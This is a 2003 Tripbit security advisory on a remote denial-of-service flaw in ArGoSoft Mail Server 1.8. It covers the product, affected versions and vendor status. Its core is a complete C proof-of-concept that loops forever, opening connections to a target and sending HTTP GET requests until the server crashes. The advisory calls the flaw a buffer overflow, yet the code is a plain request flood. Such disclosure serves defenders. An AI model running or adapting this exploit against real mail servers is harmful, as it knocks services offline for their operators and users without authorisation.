contributed by: rushjo
======================================================================================
Tripbit Security Advisory
TA-2003-06 Denial of Service Attack against ArGoSoft Mail Server Version 1.8 (1.8.3.5)
======================================================================================
PROGRAM: ArGoSoft Mail Server HOMEPAGE: http://www.argosoft.com
VULNERABLE VERSIONS: 1.8 (1.8.3.5)
NOT VULNERABLE VERSIONS: 1.8 Plus and 1.8 Prof RISK: Medium
IMPACT: Denial of Service Attack RELEASE DATE: 2003-06
======================================================================================
TABLE OF CONTENTS
======================================================================================
1..........................................................DESCRIPTION 2..............................................................DETAILS 3..............................................................EXPLOIT 4............................................................SOLUTIONS 5........................................................VENDOR STATUS 6..............................................................CREDITS 7...........................................................DISCLAIMER 8...........................................................REFERENCES 9.............................................................FEEDBACK
1. DESCRIPTION
======================================================================================
"ArGoSoft Mail Server is fully functional SMTP/POP3/Finger server for Windows
95/98/Me/2k/XP, which will let you turn your computer into the email system.
It's very compact, takes only about 1Mb of disk space, does not have any specific
memory requirements, and what is the most important - it's very easy to use.
Currently we have three different versions of server: freeware, Plus and Pro."
(This description is taken from the website of ArGo Software Design)
2. DETAILS
======================================================================================
¤ Remote DoS :
A security vulnerability in ArGoSoft Mail Server "Freeware" allows remote attackers to crash the server by executing too much "get Request.
The command can be issued to the Mail server by everyone. The attacker need no
authentification.
3. EXPLOIT
======================================================================================
This is an Proof of Concept Exploit of this Buffer Overflow Vul- nerability.
NOTE: This is only for INFORMATION purposes and not for any destructive acts!
/**********************************************************************************
*
* Denial of Service Attack against ArGoSoft Mail Server Version 1.8 (1.8.3.5)
* * Tripbit Security Development
* ---------------------------------
*
* Author: posidron
*
* Contact
* [-] Mail: posidron@tripbit.org
* [-] Web: http://www.tripbit.org
* [-] Forum: http://www.tripbit.org/wbboard
* [-] IRC: irc.euirc.net 6667 #tripbit
*
* Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe, PeaceTreaty
*
**********************************************************************************/
#include <stdio.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h>
int main(int argc, char *argv[])
{
int port, sockfd;
struct sockaddr_in server;
struct hostent *host;
char sendstring[1024];
strcpy(sendstring, "GET /index.html HTTP/1.0\n\n");
if(argc < 3)
{
printf("Usage: %s [target] <port>\n", argv[0]);
exit(0);
}
port = atoi(argv[2]);
host = gethostbyname(argv[1]);
if(host == NULL)
{
printf("Connection failed!...\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = inet_addr((char*)argv[1]);
printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");
for(;;)
{
if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
{
printf("socket() failed!\n");
exit(0);
}
if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) < 0)
{
printf("connect() failed!\n");
close(sockfd);
}
if (write(sockfd, sendstring, strlen(sendstring)) < 0)
{
break;
}
close(sockfd);
}
printf("Attack done!...\n");
}This error will produce an "crash" of the ArGoSoft Mail Server.
4. SOLUTIONS
================================================================================
No solution for the moment.
5. VENDOR STATUS
================================================================================
The vendor has reportedly been notified but no answer of to this report.
6. CREDITS
================================================================================
Discovered by posidron
7. DISLAIMER ======================================================================
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
8. REFERENCES ======================================================================
- Original Version: http://www.tripbit.org
9. FEEDBACK ======================================================================
Please send suggestions, updates, and comments to:
Tripbit Security Advisory http://www.tripbit.org rushjo@tripbit.org posidron@tripbit.org
